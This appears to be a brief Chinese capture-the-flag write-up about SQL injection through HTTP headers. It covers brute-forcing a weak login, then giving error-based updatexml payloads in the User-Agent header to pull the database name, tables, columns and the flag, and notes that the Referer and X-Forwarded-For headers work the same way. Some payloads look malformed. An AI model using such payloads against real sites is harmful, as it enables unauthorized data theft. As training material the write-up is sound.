Header注入
header注入依靠head传参($_SERVER)
1、bp抓包爆破出账号密码admin,123456

2、查看源码发现$_SERVER参数通过useragent传参 构造playload:'or updatexml(1,(concat('#',database()),1),1) --qwe 拿到库名head_error

3、构造playload拿到表名,列名,数据
' or updatexml('a',concat('~',(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),'b'),1) -- qwe //表
' or updatexml('a',concat('~',(select column_name from information_schema.columns where table_name='flag_head' limit 0,1)),'b'),1) -- qwe //列
' or updatexml('a',concat('~',(select flag_h1 from flag_head limit 0,1)),'b'),1) -- qwe



RANK2在refer参数里传参同理可得flag
RANK3在x-forwarded-for里传参同理可得flag